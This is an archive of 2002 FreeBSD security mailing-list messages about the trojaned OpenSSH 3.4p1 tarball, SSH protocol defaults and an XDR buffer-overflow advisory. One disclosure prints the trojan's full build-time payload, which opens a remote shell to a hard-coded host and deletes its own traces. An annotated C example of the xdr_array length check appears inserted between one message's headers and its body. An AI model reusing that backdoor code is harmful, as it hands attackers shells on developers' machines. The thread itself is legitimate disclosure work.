I think it's clearer if you write the condition the other way round:

    if ((c > maxsize || c > UINT_MAX/elsize) && (xdrs->x_op != XDR_FREE)) {
        return (FALSE);

Should I file a PR or am I completely off track here?

Bye, Rolf

From owner-freebsd-security Thu Aug 1 03:56:01 2002
Date: Thu, 01 Aug 2002 12:55:46 +0200
From: Christoph Wegener
To: Shunichi Konno, Mario Pranjic
Cc: freebsd-security@FreeBSD.ORG
Organization: Lehrstuhl fuer Biophysik - Ruhr-Universitaet Bochum
Subject: Re: openssh-3.4p1.tar.gz trojaned
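The xdr_array length check that Rolf Grossmann's message above questions, as an added C example written for this archive page; it is not code from the advisory's patch or from any list participant. It puts the &&-form and the ||-form of the quoted condition side by side with a helper that reports when c * elsize wraps, and it also shows a second case the mail only implies: with && the caller's maxsize bound is lost as well. The enum and function names are stand-ins of my own, and elsize == 0 is rejected up front, which the quoted snippets do not do.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* Stand-in for the XDR operation type: only XDR_FREE matters here, since
 * the quoted check skips length validation when freeing. */
enum xdr_op { XDR_ENCODE, XDR_DECODE, XDR_FREE };

/* The condition written with && as quoted in Rolf's mail: the count is
 * rejected only when it exceeds BOTH the caller's maxsize AND the
 * multiplication bound. (elsize == 0 is rejected here to avoid division
 * by zero; the quoted snippet has no such guard.) */
bool count_ok_and_form(unsigned int c, unsigned int maxsize,
                       unsigned int elsize, enum xdr_op op)
{
    if (elsize == 0)
        return false;
    if ((c > maxsize && UINT_MAX / elsize < c) && op != XDR_FREE)
        return false;
    return true;
}

/* The || form Rolf proposes: reject when EITHER bound is exceeded. */
bool count_ok_or_form(unsigned int c, unsigned int maxsize,
                      unsigned int elsize, enum xdr_op op)
{
    if (elsize == 0)
        return false;
    if ((c > maxsize || c > UINT_MAX / elsize) && op != XDR_FREE)
        return false;
    return true;
}

/* True when nodesize = c * elsize would wrap in unsigned int arithmetic,
 * i.e. the buffer allocated would be smaller than the element count
 * implies. */
bool nodesize_wraps(unsigned int c, unsigned int elsize)
{
    return (unsigned long long)c * elsize > UINT_MAX;
}

int main(void)
{
    /* Constructed case 1: an application that "didn't care" and passed
     * maxsize = UINT_MAX, with a count that overflows nodesize for
     * 4-byte elements. The &&-form accepts it; the ||-form rejects it. */
    unsigned int c = 0x40000001u, elsize = 4;
    printf("c=%#x elsize=%u wraps=%d  &&-form ok=%d  ||-form ok=%d\n",
           c, elsize, nodesize_wraps(c, elsize),
           count_ok_and_form(c, UINT_MAX, elsize, XDR_DECODE),
           count_ok_or_form(c, UINT_MAX, elsize, XDR_DECODE));

    /* Constructed case 2: a sane maxsize, but c above it without any
     * overflow. Pre-patch code rejected this on maxsize alone; the
     * &&-form lets it through. */
    printf("c=2048 maxsize=1024  &&-form ok=%d  ||-form ok=%d\n",
           count_ok_and_form(2048, 1024, 4, XDR_DECODE),
           count_ok_or_form(2048, 1024, 4, XDR_DECODE));
    return 0;
}
```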
Hi,

but be careful: you have to check it with the original tgz-file, because
the shell script removes itself from the archive once you have installed.
So taking your tree and making a tgz is NO solution to test...

Greetz
Christoph

1.8.2002 12:15:22, Mario Pranjic wrote:

>On Thu, 1 Aug 2002, Shunichi Konno wrote:
>
>> I have the same openssh-3.4.tgz, whose md5 checksum is
>> 39659226ff5b0d16d0290b21f67c46f2, and it contains no files like the
>> ones the trojaned openssh-3.4p1.tgz has.
>
>So I checked it too. :) No bf-test.c in source.

--
   .-.      Ruhr-Universitaet Bochum
   /v\      L I N U X    Lehrstuhl fuer Biophysik
  // \\    >Penguin Computing<   c/o Christoph Wegener
 /(   )\    Gebaeude ND 04/Nord
  ^^-^^     D-44780 Bochum, GERMANY
            Tel: +49 (234) 32-25754   Fax: +49 (234) 32-14626
            mailto:cwe@bph.ruhr-uni-bochum.de
            http://www.bph.ruhr-uni-bochum.de

From owner-freebsd-security Thu Aug 1 04:11:48 2002
Date: Thu, 1 Aug 2002 13:07:51 +0200 (MET DST)
From: Mario Pranjic
To: Christoph Wegener
Cc: Shunichi Konno, Mario Pranjic
Subject: Re: openssh-3.4p1.tar.gz trojaned

On Thu, 1 Aug 2002, Christoph Wegener wrote:

> Hi,
> but be careful: you have to check it with the original tgz-file, because
> the shell script removes itself from the archive once you have installed.
> So taking your tree and making a tgz is NO solution to test...

tar tzf openssh-3.4.tgz | less

In my distfiles, I find no sign of bf-test.c.

When I did:
make fetch; make checksum
in the openssh ports dir I got the checksum mismatch and I found the
bf-test.c:
ssh/ssh-keygen/bf-test.c

My old md5 (from which the openssh port is compiled):
MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2

New (just downloaded) openssh source:
MD5 (openssh-3.4.tgz) = bda7c80825d9d9f35f17046ed90e1b0a

This one DOES contain the bf-test.c file.

Any ideas what is going on?

Mario Pranjic, dipl.ing.

From owner-freebsd-security Thu Aug 1 04:19:57 2002
Date: Thu, 01 Aug 2002 20:19:52 +0900
From: Shunichi Konno
To: freebsd-security@FreeBSD.ORG
Subject: Re: openssh-3.4p1.tar.gz trojaned

Hello.

Thank you for your comment, but there was no such problem. :)
I checked whether it was trojaned or not after I extracted openssh-3.4.tgz.
And I know too, that "bf-test.out", which is the shell script made by
bf-test.c, will change Makefile and Makefile.in, and remove bf-test* like
this:

grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out
grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out
rm -f bf-test*

On Thu, 01 Aug 2002 12:55:46 +0200 Christoph Wegener wrote:

CW> but be careful: you have to check it with the original tgz-file, because
CW> the shell script removes itself from the archive once you have installed.
CW> So taking your tree and making a tgz is NO solution to test...

----------
KONNO Shunichi

From owner-freebsd-security Thu Aug 1 04:35:09 2002
Date: Thu, 01 Aug 2002 13:34:51 +0200
From: Christoph Wegener
To: Mario Pranjic
Cc: Shunichi Konno, Mario Pranjic, freebsd-security@FreeBSD.ORG
Subject: Re: openssh-3.4p1.tar.gz trojaned

Hi,

well as I mentioned in one of my earlier mails, the tarball on the openbsd
repositories has been exchanged and infected with a trojan. So it is clear
that the version you just downloaded is infected...

Christoph

1.8.2002 13:07:51, Mario Pranjic wrote:

>On Thu, 1 Aug 2002, Christoph Wegener wrote:
>
>> Hi,
>> but be careful: you have to check it with the original tgz-file, because
>> the shell script removes itself from the archive once you have installed.
>> So taking your tree and making a tgz is NO solution to test...
>
>tar tzf openssh-3.4.tgz | less
>
>In my distfiles, I find no sign of bf-test.c.
>
>When I did:
>make fetch; make checksum
>in the openssh ports dir I got the checksum mismatch and I found the
>bf-test.c:
>ssh/ssh-keygen/bf-test.c
>
>My old md5 (from which the openssh port is compiled):
>MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2
>
>New (just downloaded) openssh source:
>MD5 (openssh-3.4.tgz) = bda7c80825d9d9f35f17046ed90e1b0a
>
>This one DOES contain the bf-test.c file.
>
>Any ideas what is going on?

From owner-freebsd-security Thu Aug 1 04:44:53 2002
Date: Thu, 1 Aug 2002 13:40:56 +0200 (MET DST)
From: Mario Pranjic
To: Christoph Wegener
Subject: Re: openssh-3.4p1.tar.gz trojaned

On Thu, 1 Aug 2002, Christoph Wegener wrote:

> Hi,
> well as I mentioned in one of my earlier mails, the tarball on the openbsd
> repositories has been exchanged and infected with a trojan. So it is clear
> that the version you just downloaded is infected...

Of course. I understand that.

But, I wanted your opinion about the openssh that I installed yesterday (or
the day before, not so sure right now).

It has the right md5 checksum and no trojan file in the tarball.

If I got it right, the openssh source tarball has changed in the past 24
hours on ftp.openbsd.org and that one is infected.

If so, I installed the clean version before the one with the trojan was put
on the ftp server.

We'll see what the maintainer will say about it (dinoex@FreeBSD.org).

Mario Pranjic, dipl.ing.

From owner-freebsd-security Thu Aug 1 05:06:54 2002
Date: Thu, 1 Aug 2002 08:06:41 -0400 (EDT)
From: Trevor Johnson
To: Dag-Erling Smorgrav
Cc: Mike Tancsa, Ruslan Ermilov
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
Dag-Erling Smorgrav wrote:

> Trevor Johnson writes:
> > Use of protocol version 1 makes an insertion attack possible, according to
> > .
>
> That same page also explains that OpenSSH contains code to make such
> attacks very difficult.

Their actual wording is "difficult but possible," not "very difficult." The
CRC32 compensation detection code to which you allude used to have a remote
root hole, which was published and widely exploited. In response, CERT
recommended in December of 2001 that protocol version 1 be disabled:

  Because the vulnerability affects software handling the SSHv1 protocol,
  sites may wish to enable SSHv2 support only and disable SSHv1 fallback
  support. Refer to your secure shell server software documentation for
  information about how to accomplish this. Disabling SSHv1 support is
  generally a good practice, since a number of other vulnerabilities exist
  in the SSHv1 protocol itself and software handling of this protocol.

That is from .

> > The vulnerability was
> > published by CORE SDI in June of 1998. I would like to see protocol
> > version 1 disabled by default, with a note in UPDATING about the change.
>
> No. I will not arbitrarily lock users out of their machines.

Many users already must read UPDATING to get a working installation of
OpenSSH. The OpenBSD folks have a philosophy that users who don't
understand their systems and don't spend much time configuring them
shouldn't become easy marks for attackers because of the installation
defaults. They explain it better than I, at .

Removing a weakness in security is not an arbitrary change. It is the
type of change that is suitable for FreeBSD -STABLE in spite of
inconvenience to users, and making one-line changes to two files is only a
mild inconvenience. Please reconsider.

--
Trevor Johnson

From owner-freebsd-security Thu Aug 1 05:12:28 2002
Date: Thu, 1 Aug 2002 14:11:24 +0200
From: Artur Lindgren
To: freebsd-security@FreeBSD.ORG
Subject: Trojan located in latest openssh tar files

Greetings,

I noticed that openssh-3.4p has a trojan horse (available from
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
and some of the mirrors.
(ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/ ftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/ ftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/ ) After compiling the file bf-test.c you will notice that it does following: # testing in raw ecb mode #!/bin/sh cat >conftest.c <<_ACEOF #include #include #include #include #include #include #include #include jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig (int sig){close(s);sleep(3600);longjmp(env,0); }int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2); memset(&act,0,sizeof(act));act.sa_handler=sig; sigaction(SIGALRM,&act,NULL);do{setjmp(env); if((s=socket(AF_INET,SOCK_STREAM,0))==(1))exit(1); memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET; sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr ("203.62.158.32");alarm(10);if(connect(s, (struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1) ;if((x=read(s,&c,1))==(-1)){exit(1);} else if(x==1){switch(c){case 'A':exit(0);case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2) ;a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break; case 'M':alarm(0);sig(0);break;default:}}else{exit (0);}}while(1);} _ACEOF (grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out rm -f bf-test* TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`" if ! 
test $TESTPROG ; then TESTPROG=sh; fi gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1

It runs once, upon compilation of openssh, and is named sh or the compiling
user's default shell in the process listing.

This trojan attempts to connect to 203.62.158.32:6667 (a hacked machine
which has been secured now), and awaits one of three characters as the
command:

D  execs /bin/sh
M  respawns
A  kills the daemon

The /bin/sh executed via the D command was controlled by the daemon
listening on 203.62.158.32:6667, potentially meaning that people affected
by this have given a shell, possibly root, to a user unknown.

"Let this be a lesson. Don't use root unless you REALLY have to."

Regards,
Artur Lindgren, Comitnet AB

Special thanks to (Ratler, Mrsaint, Jordan, Drabant, Hans and all of you
ISP people in sweden :D)

Thanks to ^Sarge^ for quickly taking care of the hacked machine this
trojan connected to.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:13:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2E91B37B400; Thu, 1 Aug 2002 05:13:29 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8314B43E6A; Thu, 1 Aug 2002 05:13:28 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 620EE535F; Thu, 1 Aug 2002 14:13:23 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Trevor Johnson Cc: Mike Tancsa , Ruslan Ermilov , Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] References: <20020705170032.V94044-100000@blues.jpj.net> From: Dag-Erling Smorgrav Date: 01 Aug 2002 14:13:22 +0200 In-Reply-To: <20020705170032.V94044-100000@blues.jpj.net> Message-ID: Lines: 11 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Trevor Johnson writes: > Removing a weakness in security is not an arbitrary change. It is the > type of change that is suitable for FreeBSD -STABLE in spite of > inconvenience to users, and making one-line changes to two files is only a > mild inconvenience. So make that change on your own systems. 
DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:23:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EE91B37B481 for ; Thu, 1 Aug 2002 05:23:21 -0700 (PDT) Received: from yoda.bph.ruhr-uni-bochum.de (yoda.bph.ruhr-uni-bochum.de [134.147.196.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id 86E1043E42 for ; Thu, 1 Aug 2002 05:23:20 -0700 (PDT) (envelope-from cwe@bph.ruhr-uni-bochum.de) Received: from gonzo (gonzo [134.147.196.22]) by yoda.bph.ruhr-uni-bochum.de (8.8.8/8.8.8) with SMTP id OAA01977; Thu, 1 Aug 2002 14:23:15 +0200 From: Christoph Wegener To: Mario Pranjic Cc: freebsd-security@FreeBSD.ORG Date: Thu, 01 Aug 2002 14:23:14 +0200 X-Priority: 3 (Normal) Organization: Lehrstuhl fuer Biophysik - Ruhr-Universitaet Bochum In-Reply-To: Message-Id: Subject: Re: openssh-3.4p1.tar.gz trojaned MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" X-Mailer: Opera 6.04 build 1135 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi again, yes you are right: I agree that the version on the ftp-server must have been changed during the last 24 hours - so you _might_ be safe... But who can guaranty that... :(( AFAIK: if you don not have the trojan in the origin tarball this is a good indicator for being safe... Just my 2 cents...cheers Christoph 1.8.2002 13:40:56, Mario Pranjic wrote: >Of course. I understand that. > >But, I wanted your opinion about the openssh that installed yesterday (or >the day before, not so sure right now). > >It has the right md5 checksum and no trojan file in tarball. 
> >If I got it right, openssh source tarball has changed in past 24 hourhs on >ftp.openbsd.org and that one is infected. > >If so, I installed the clean version before the one with trojan was put on >ftp server. > >We'll see what will the maintainer say about it (dinoex@FreeBSD.org). -- .-. Ruhr-Universitaet Bochum /v\ L I N U X Lehrstuhl fuer Biophysik // \\ >Penguin Computing< c/o Christoph Wegener /( )\ Gebaeude ND 04/Nord ^^-^^ D-44780 Bochum, GERMANY Tel: +49 (234) 32-25754 Fax: +49 (234) 32-14626 mailto:cwe@bph.ruhr-uni-bochum.de http://www.bph.ruhr-uni-bochum.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:28: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5CC6237B400; Thu, 1 Aug 2002 05:28:00 -0700 (PDT) Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by mx1.FreeBSD.org (Postfix) with ESMTP id A15F143E72; Thu, 1 Aug 2002 05:27:59 -0700 (PDT) (envelope-from trevor@jpj.net) Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g71CRwot025652; Thu, 1 Aug 2002 08:27:58 -0400 (EDT) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g71CRws9025649; Thu, 1 Aug 2002 08:27:58 -0400 (EDT) X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs Date: Thu, 1 Aug 2002 08:27:58 -0400 (EDT) From: Trevor Johnson To: Dag-Erling Smorgrav Cc: Mike Tancsa , Ruslan Ermilov , Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] In-Reply-To: Message-ID: <20020801081645.T19455-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) 
X-Loop: FreeBSD.org

Dag-Erling Smorgrav wrote:

> Trevor Johnson writes:
> > Removing a weakness in security is not an arbitrary change. It is the
> > type of change that is suitable for FreeBSD -STABLE in spite of
> > inconvenience to users, and making one-line changes to two files is only a
> > mild inconvenience.
>
> So make that change on your own systems.

This is the section of http://www.openbsd.org/security.html#default which I had hoped you would read:

    To ensure that novice users of OpenBSD do not need to become security
    experts overnight (a viewpoint which other vendors seem to have), we
    ship the operating system in a Secure by Default mode. All non-essential
    services are disabled. As the user/administrator becomes more familiar
    with the system, he will discover that he has to enable daemons and
    other parts of the system. During the process of learning how to enable
    a new service, the novice is more likely to learn of security
    considerations.

    This is in stark contrast to the increasing number of systems that ship
    with NFS, mountd, web servers, and various other services enabled by
    default, creating instantaneous security problems for their users
    within minutes after their first install.

In enabling protocol version 1 by default, you have created a security problem for new users of FreeBSD. If they become aware of the problem, they can reconfigure their systems as you advise me to do. It is better for users to choose to diminish their security when they need a service.

-- 
Trevor Johnson

From owner-freebsd-security Thu Aug 1 05:34:04 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2DAA037B400 for ; Thu, 1 Aug 2002 05:33:57 -0700 (PDT)
Received: from addr-mx01.addr.com (addr-mx01.addr.com [209.249.147.145]) by mx1.FreeBSD.org (Postfix) with ESMTP id CE74043E70 for ; Thu, 1 Aug 2002 05:33:56 -0700 (PDT) (envelope-from torvalds@addr.com)
Received: from proxy1.addr.com (proxy1.addr.com [209.249.147.28]) by addr-mx01.addr.com (8.12.2/8.12.2) with ESMTP id g71CXDmQ034888; Thu, 1 Aug 2002 05:33:14 -0700 (PDT)
Received: from TS22 ([202.71.153.170]) by proxy1.addr.com (8.11.6/8.9.1) with ESMTP id g71CXB244368; Thu, 1 Aug 2002 05:33:12 -0700 (PDT) (envelope-from torvalds@addr.com)(envelope-to )
Message-ID: <016301c23957$7d8436f0$9600a8c0@blraddrcom>
From: "Naga Suresh B"
To: "Christoph Wegener"
Subject: Re: openssh-3.4p1.tar.gz trojaned
Date: Thu, 1 Aug 2002 18:02:22 +0530
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Scanned-By: MIMEDefang 2.15 (www dot roaringpenguin dot com slash mimedefang)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

How can we find out whether the trojan attacked our server or not?
----- Original Message -----
From: "Christoph Wegener"
To: "Mario Pranjic"
Sent: Thursday, August 01, 2002 5:53 PM
Subject: Re: openssh-3.4p1.tar.gz trojaned

> Hi again,
> yes you are right: I agree that the version on the ftp-server must have been changed during the last 24 hours - so you _might_ be safe...
> But who can guarantee that... :(( AFAIK: if you do not have the trojan in the original tarball this is a good indicator for being safe...
>
> Just my 2 cents... cheers
> Christoph
>
> 1.8.2002 13:40:56, Mario Pranjic wrote:
>
> >Of course. I understand that.
> >
> >But, I wanted your opinion about the openssh that I installed yesterday (or
> >the day before, not so sure right now).
> >
> >It has the right md5 checksum and no trojan file in the tarball.
> >
> >If I got it right, the openssh source tarball has changed in the past 24 hours on
> >ftp.openbsd.org and that one is infected.
> >
> >If so, I installed the clean version before the one with the trojan was put on the
> >ftp server.
> >
> >We'll see what the maintainer will say about it (dinoex@FreeBSD.org).
> --
>   .-.
>                                Ruhr-Universitaet Bochum
>   /v\    L I N U X             Lehrstuhl fuer Biophysik
>  // \\   >Penguin Computing<   c/o Christoph Wegener
> /(   )\                        Gebaeude ND 04/Nord
>  ^^-^^                         D-44780 Bochum, GERMANY
>
> Tel: +49 (234) 32-25754   Fax: +49 (234) 32-14626
> mailto:cwe@bph.ruhr-uni-bochum.de   http://www.bph.ruhr-uni-bochum.de

From owner-freebsd-security Thu Aug 1 05:34:51 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DC32C37B400; Thu, 1 Aug 2002 05:34:27 -0700 (PDT)
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 201AE43E77; Thu, 1 Aug 2002 05:34:25 -0700 (PDT) (envelope-from security-advisories@freebsd.org)
Received: from freefall.freebsd.org (nectar@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g71CYOJU000907; Thu, 1 Aug 2002 05:34:24 -0700 (PDT) (envelope-from security-advisories@freebsd.org)
Received: (from nectar@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g71CYODU000905; Thu, 1 Aug 2002 05:34:24 -0700 (PDT)
Date: Thu, 1 Aug 2002 05:34:24 -0700 (PDT)
Message-Id: <200208011234.g71CYODU000905@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-02:34.rpc [REVISED]
Reply-To: security-advisories@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-02:34.rpc                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Sun RPC XDR decoder contains buffer overflow

Category:       core
Module:         libc
Announced:      2002-08-01
Credits:        ISS X-Force
Affects:        All releases of FreeBSD up to and including 4.6.1-RELEASE-p5
Corrected:      2002-08-01 12:23:20 UTC (RELENG_4)
                2002-08-01 12:23:40 UTC (RELENG_4_6)
                2002-08-01 12:23:58 UTC (RELENG_4_5)
                2002-08-01 12:24:20 UTC (RELENG_4_4)
FreeBSD only:   NO

0.   Revision History

v1.0  2002-07-31  Initial release
v1.1  2002-08-01  Corrected patch

I.   Background

Sun RPC is a remote procedure call framework which allows clients to invoke procedures in a server process over a network somewhat transparently. XDR is a mechanism for encoding data structures for use with RPC. NFS, NIS, and many other network services are built upon Sun RPC.

The FreeBSD C runtime library (libc) contains an XDR encoder/decoder derived from Sun's RPC implementation.

II.  Problem Description

An error in the calculation of memory needed for unpacking arrays in the XDR decoder can result in a heap buffer overflow.

III. Impact

Any application using Sun RPC may be vulnerable to the heap buffer overflow. Depending upon the application, this vulnerability may be exploitable and lead to arbitrary code execution. Though no exploits are known to exist currently, many RPC-based services run as the superuser (such as NFS, the NIS server, rpc.statd, and others) and thus this vulnerability should be considered high-risk.

No RPC-based services are enabled by default in FreeBSD installations.

IV.  Workaround

Do not run any RPC-based services. The RPC-based services running on a machine may be determined by:

  # rpcinfo -p

To disable any RPC-based services at next boot, add (or change if it is already present) the following lines in /etc/rc.conf:

  portmap_enable="NO"
  nfs_client_enable="NO"
  nfs_server_enable="NO"
  nis_client_enable="NO"
  nis_server_enable="NO"

V.   Solution

Do one of the following:

1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.1-RELEASE-p6, 4.5-RELEASE-p15, or 4.4-RELEASE-p22).

2) To patch your present system:

The following patch has been verified to apply to FreeBSD 4.4, 4.5, and 4.6 systems.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

  # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch
  # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch.asc

b) Execute the following commands as root:

  # cd /usr/src
  # patch < /path/to/patch

c) Recompile the operating system as described in .

Note that any statically linked applications that are not part of the base system (i.e. from the Ports Collection or other 3rd-party sources) must be recompiled if they use Sun RPC.

All affected applications must be restarted in order to use the corrected library. Though it is not required, rebooting may be the easiest way to accomplish this.

VI.  Correction details

The following list contains the revision numbers of each file that was corrected in FreeBSD.

Path                                    Revision          Branch
- -------------------------------------------------------------------------
src/lib/libc/xdr/xdr_array.c            1.8.2.3           RELENG_4
                                        1.8.10.4          RELENG_4_6
                                        1.8.8.3           RELENG_4_5
                                        1.8.6.3           RELENG_4_4
src/sys/conf/newvers.sh                 1.44.2.23.2.11    RELENG_4_6
                                        1.44.2.20.2.16    RELENG_4_5
                                        1.44.2.17.2.21    RELENG_4_4
- -------------------------------------------------------------------------

VII. References

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)

iQCVAwUBPUkpkFUuHi5z0oilAQF7TQP9H50V3qUsZcWC5nemnMO9CL+QBmIuuGkE
C7p3mBxcH6mS5EmUU4zFOum4QSaEh9J47I7CGcS+sNg7JN5lfK1oSwsE9JidbZz4
kx9cQrx+rppQuQyK9tK4TXVXz0PiUdZMs3vgytJDuAOu38bg3ttUd4jhTIKHnLGh
NMjQMH2vNUk=
=yP62
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Aug 1 05:36:20 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7359B37B405; Thu, 1 Aug 2002 05:36:12 -0700 (PDT)
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7783643E72; Thu, 1 Aug 2002 05:35:53 -0700 (PDT) (envelope-from des@ofug.org)
Received: by flood.ping.uio.no (Postfix, from userid 2602) id 8E1E2535E; Thu, 1 Aug 2002 14:35:42 +0200 (CEST)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: Trevor Johnson
Cc: Mike Tancsa, Ruslan Ermilov,
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
References: <20020801081645.T19455-100000@blues.jpj.net>
From: Dag-Erling Smorgrav
Date: 01 Aug 2002 14:35:41 +0200
In-Reply-To: <20020801081645.T19455-100000@blues.jpj.net>
Lines: 25
User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Trevor Johnson writes:
> This is the section of http://www.openbsd.org/security.html#default which
> I had hoped you would read:
> [...]
This is the section of Webster's 7th edition dictionary which I had hoped you would read:

  1. no \(')n{o-}\ av [ME, fr. OE n{a-}, fr. ne not + {a-} always; akin to ON & OHG ne not, L ne-, Gk n{e-}- -- more at AYE] chiefly Scot
    1a: NOT
    1b: -- used as a function word to express the negative of an alternative choice or possibility
    2: in no respect or degree -- used in comparisons
    3: not so -- used to express negation, dissent, denial, or refusal
    4: -- used with a following adjective to imply a meaning expressed by the opposite positive statement <~ uncertain terms>
    5: -- used as a function word to emphasize a following negative or to introduce a more emphatic, explicit, or comprehensive statement
